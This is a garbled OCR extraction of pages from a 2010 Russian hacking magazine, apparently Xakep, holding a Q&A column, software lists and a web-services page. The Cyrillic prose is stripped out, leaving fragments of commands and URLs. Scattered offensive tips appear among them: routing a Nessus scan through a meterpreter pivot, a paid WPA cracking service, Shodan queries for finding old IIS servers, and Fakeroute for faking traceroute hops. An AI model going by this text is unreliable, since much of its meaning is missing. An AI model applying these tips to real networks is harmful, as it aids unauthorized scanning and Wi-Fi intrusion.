(, ). - Nessus
meterpreter-?

# proxychains /usr/sbin/nessusd -D

5. Nessus- .
Q: ,
Wireshark . -
?
A: , Wireshark- ,

.
.
Wireshark Tshark.

(
tshark -h).
?

. tshark
-D.
:

A: , -

, . (
,
,
):
X 05 /136/ 10

1. \Device\NPF_{11A468B6-C06545F6-AB32-D69695A6F601} (MS Tunnel


Interface Driver)
2. \Device\NPF_{A16900A3-020C4B05-B430-4CD67527C189} (Realtek

RTL8168B/8111B PCI-E Gigabit


Ethernet NIC)

:
tshark -i 2 -wexample.pcap -f "tcp[13] = 0x14",

-i ;
-w , ;
-f , libpcap ( ,
tcp 13- 0x14, RST ACK).
www.
cs.ucr.edu/~marios/ethereal-tcpdump.pdf
www.tcpdump.org/tcpdump_man.html.
, <Ctrl-C>.
example.pcap Wireshark
, , .
Q: ,

, ,
?
A: ,
,
IDA:
BinfDiff (www.zynamics.com/bindiff.html)
TurboDiff (corelabs.coresecurity.com/index.p
hp?module=Wiki&action=view&type=tool&nam
e=turbodiff)
: , . (*.idb ),
Edit Plugins Turbodiff/Bindiff
compare with,

. ,
.

Q: XSS/CSRF,
JavaScript-. ,
?
A: , , XSS, Javascript
Firefox
+ Firebug + Eventbug.
, Eventbug, ,
. ,
Firebug',
( ,
Firefox - :)).
, :

.
Firebug
Events. ,

141

UNITS

- , ,
. Eventbug
Firefox 3.6 Firebug 1.5 .
Eventbug -,
getfirebug.com/
releases/eventbug/1.5/eventbug-0.1b4.xpi.
Q: , Linux traceroute
. - ?
A: :).
Fakeroute
(www.thoughtcrime.org/software/fakeroute).
,
. ,
:

traceroute to yyyy (63.199.yy.yyy),


30 hops max, 38 byte packets
1 xx.xxx.com (172.17.8.1) 0.867 ms
0.713 ms 0.601 ms
2 adsl-64.dsl.snfc21.pacbell.net
(64.165.xxx.xxx) 2.065 ms 1.895 ms
1.777 ms
3 yyyy.com (63.199.yy.yyyy) 28.585
ms 26.445 ms 25.489 ms


Fakeroute':
traceroute to yyyy (63.199.yy.yyy),
30 hops max, 38 byte packets
1 xx.xxx.com (172.17.8.1) 0.867 ms
0.713 ms 0.601 ms
2 adsl-64.dsl.snfc21.pacbell.net
(64.165.xxx.xxx) 2.065 ms 1.895 ms
1.777 ms
3 wh243.eop.gov (198.137.241.43)
0.442 ms 0.553 ms 0.42 ms
4 foundation.hq.nasa.gov
(198.116.142.34) 0.442 ms 0.542 ms
0.422 ms
5 yyyy.com (63.199.yy.yyyy) 28.585
ms 26.445 ms 25.489 ms

,

:).
Q:
,
? , .
A: , ,

.
,
,
-.
VPN,

142

, ,

. , VPN,
, ,

.
WPA-
WPA Cracker (www.wpacracker.
com). 400 , ( 135
),
.
, 17$
WPA
ZIP-.
20 ,
5 . WWW2 SHODAN (www.shodanhq.
com),
(,
Apache).
,
XML ,
. , ,

.
Q:
? :)
A: , www.
malwaredomainlist.com www.malwareurl.
com ,
. : ,
,

( RegMon/FileMon), ,
, .

, .

?
A: PowerShell',
Get-WMIObject Win32_
LogicalDisk. , c:\hostlist.txt,


:

Get-WMIObject Win32_LogicalDisk
-filter DriveType=3?
-computer (Get-Content c:\
hostlist.txt) | Select
SystemName,DeviceID,VolumeName,@
{Name=size(GB);Expression={{0
:N1} -f($_.size/1gb)}},@{Name=
freespace(GB);Expression={{0:
N1} -f($_.freespace/1gb)}} | OutGridView

, .
Q: MySQL SQL Server?
A: -

,
.
, MySQL
SQL Server.
,
Microsoft
Sql Server Migration Assistant for MySQL (bit.
ly/8peZcm).
Q: HD-.
( ), .
:

Q: NTLM-,

. -

A: Python', , ,

A: AVI-Mux GUI (www.


alexander-noe.com/video/amg) , .
:
;
( generate data source);
( Drag'n'Drop') ;
Start,
.

. z

:
import hashlib,binascii
hash = hashlib.new('md4',
"thisismyhashvalue".encode('utf16le')).digest()
print binascii.hexlify(hash)

Q:
(30
, ).

HDD, -

X 05 /136/ 10

>Net
AnalogX LinkExaminer 1.01
Feed Notifier 2.2
Gbridge 2.0
Http File Server 2.2f
mRemote 1.63
PrimeDesktop Beta 1.0
SmartCode VNC Manager 5.5

>Multimedia
AIMP 2.61.560
Camtasia Studio 7.0.0
CDBurnerXP 4.3.0
Faceworx 1.0
Fotosketcher 1.96
Foxit Reader 3.2.1
LEGO Digital Designer 3.0.11
MetatOGGer 3.12
Miro 3.0
SeeMonkey Demo
Tableau Public 5.1
Teemoon Video Matching 1.0.5
Wondershare PPT2Video Free
YoWindow 2.0

>Misc
7 Taskbar Thumbnail Customizer
Agent Ransack 2010
Ant Renamer 2.10.0
BatteryCare 0.9.7.10
CodySafe
Desk Drive 1.8.2
Duplicate Music Files Finder 1.6
ExQueues Shell Queue 0.3.10
Keys Extender r12
Launchy 2.5
LogViewer Pro 1.8.0
Moo0 RightClicker 1.38
TreeSize Free 2.4
Ultimate Windows Tweaker 2.1
UNetbootin 4.29
winPenPack Flash Essential 3.6

>Games
Cheat Engine 5.6
Construct 0.99.62
Hedgewars 0.9.13
Souptoys 1.6.0.8
Engine Development Kit 1.9.1

>>WINDOWS
>>Development
ILMerge
JRE 6u19
Microsoft Application Verifier 4.0
Rad Software Regular Expression
Designer v1.4
SciTE 2.10
SQLite Expert Personal 2.4.12
SQLyog 8.32
Sublime Text 1.3
TreeSize Free 2.4
UltraEdit 16.00
Visual Paradigm for UML 7.2
Community Edition

>>UNIX
>Desktop
Amarok 2.3
Nairo-compmgr 0.3.0
Clementine 0.2
DirSync Pro 1.24
Exaile 0.3.1
FBReader 0.12.9
Gaupol 0.15.1
gLabels 2.2.7
Gnumeric 1.10
KMPlayer 0.11.2
mhWaveEdit 1.4.18
OGMRip 0.13.4
Openbox 3.4.11.1
OpenShot 1.1
Pinta 0.2
RecordStream 0.9.2
Scribus 1.3.6
Simple Movie Catalog 1.3.0
Smb4k 0.10.6
TeXmacs 1.0.7.4
VK_search 0.1.0

>System
Auslogics Disk Defrag 3.1.4
Comodo Time Machine 2.6.1
DLL Archive 1.01
Double Driver 3.0
Driver Magician Lite 3.49
ImDisk Virtual Disk Driver 1.2.8
Open Hardware Monitor 0.1.28
Parted Magic 4.9
PortMapper 1.04
Process Explorer 12.01
Software Informer 1.0.5
VirtualBox 3.1.6
ZeuApp 1.4

>Security
CHScanner 0.9.8.1
Digital Forensics Framework 0.5.0
Eraser 6.0.6
FSF 0.7.3.9
Kon-Boot 1.1
Nmap 5.30BETA1
OWASP CSRFTester 1.0
PenTBox 1.3.2
Plecost 0.2.2-8
Scalp 0.4
SIP Inspector 1.0
StreamArmor v1
Toolza 1.0
VASTO beta
w3af 1.0rc3
WebCastellum 1.8.3
WebRaider 0.2.3.8
Websecurify 0.5
XSSer 0.4

StrongDC++ 2.41
TeamViewer 5.0.8
TightVNC 2.0 Beta 1
WinDump 3.9.5
WinPcap 4.1.1

>Security
ClamAV 0.95.3
Dnswall 0.1.4
Dradis 2.5.1
Dsniff 2.3
Flint
HnTool
Lshell 0.9.10
Ncrack 0.01a
OpenSSL 1.0.0
Passwdqc 1.2.1
Pyscanlogd 0.5
Ratproxy 1.58
Skipfish 1.26b
Sqlmap 0.8
Stunnel 4.32
Surfjack 0.2b
Ubitack

>Net
0MQ 2.0.6
Darkstat 3.0.713
EisKaltDC++ 2.0
elFinder 1.1
Google Chrome 5.0.342.7 Beta
Instantbird 0.1.3
Khal 0.0.1
Miro 3.0.0
Mozilla Firefox 3.6.2
Mpop 1.0.20
Opera 10.51
pyAggr3g470r
Rekonq 0.4.0
Retroshare 0.5.0
Rspamd 0.2.9
rTorrent 0.8.6
Rutorrent 3.0
Sharktorrent 0.2.0.4
Twitim 1.4.2
Uget 1.5.0.3

>Games
SuperTux 0.3.3

>Devel
Android NDK r3
BPython 0.9.6.2
C++ Sockets Library 2.3.9.2
GDB 7.1
GSQL 0.2.2
GTK+ 2.20.0
libimobiledevice 1.0.0
libpng 1.4.1
libtorrent 0.14.9
nwcc 0.8.1
Octave 3.2.4
Parrot 2.2.0
PyInstaller 1.4
PyPy 1.2
Python 2.6.5
Redcar 0.3.4dev
SolarPHP 1.0
Squeak 4.0
Titanium 1.0
ZeroC ICE 3.4

>
Damn Vulnerable App 1.0.6
moth 0.6
Mutillidae 1.3
SecuriBench .91a
VMvicnum 1.4
WebGoat 5.2
WebMaven 1.01

>X-distr
NetBSD 5.0.2
System Rescue CD 1.5.0

>System
Ailurus 10.03.2
ATI Catalyst 10.3
Fio 1.38
Grep 2.6
Install Kernel 0.9.4
Linux From Scratch 6.6
Linux Kernel 2.6.33.1
Mdadm 2.6.9
Mirmon 2.3
NTFS-3G 2010.3.6
nVidia 195.36.15
Synchrorep 1.4.5
Tar 1.23
VirtualBox 3.1.6
Wine 1.1.41
XNeur+gXNeur 0.9.8
Yum 3.2.27

>Server
Apache 2.2.15
BIND 9.7.0
CUPS 1.4.2
DHCP 4.1.1
Freeradius 2.1.8
Lighttpd 1.4.26
Monkeyd 0.9.3
MySQL 5.1.45
NFS-Ganesha 0.99.63
OpenLDAP 2.4.21
OpenSSH 5.4
OpenVPN 2.1.1
Postfix 2.7.0
PowerDNS 3.2
Pure-ftpd 1.0.29
RabbIT 4.5
Samba 3.5
Squid 3.0.STABLE25
Tnftpd 20100324
Vsftpd 2.2.2

VMvicnum 14
Webpentools 0.1
Yummy

05(136) 2010

UNITS

HTTP:// WWW2

WAYBACK MACHINE
web.archive.org

SHODAN

www.shodanhq.com
Google, , ? SHODAN . / ,
.
( , , FTP/
Telnet/SSH-) , - . ,
, Apache, Apache
. : apache
2.2.3 . ,
country, hostname, net, os, port. , ,
ISS, :
Microsoft IIS os:"windows 2000" country:US.


Linux

RECONSTRUCTOR

- ,
, -
, . -,
Goolge . -, Wayback Machine, ,
. ,
, ,
. , ,
Energizer ( MEGANEWS),
Wayback Machine,

.

MOCKINGBIRD

www.reconstructor.org www.gomockingbird.com
WWW2 SUSE Studio (susestudio.
com) SUSE Linux.
Reconstructor
Ubuntu Debian. Linux,
. ,
, , ,
. Linux
, .

144


-, Axure RP
(www.axure.com). ,
, , .
mockingbird,
-. .
.
PNG/PDF .

X 05 /136/ 10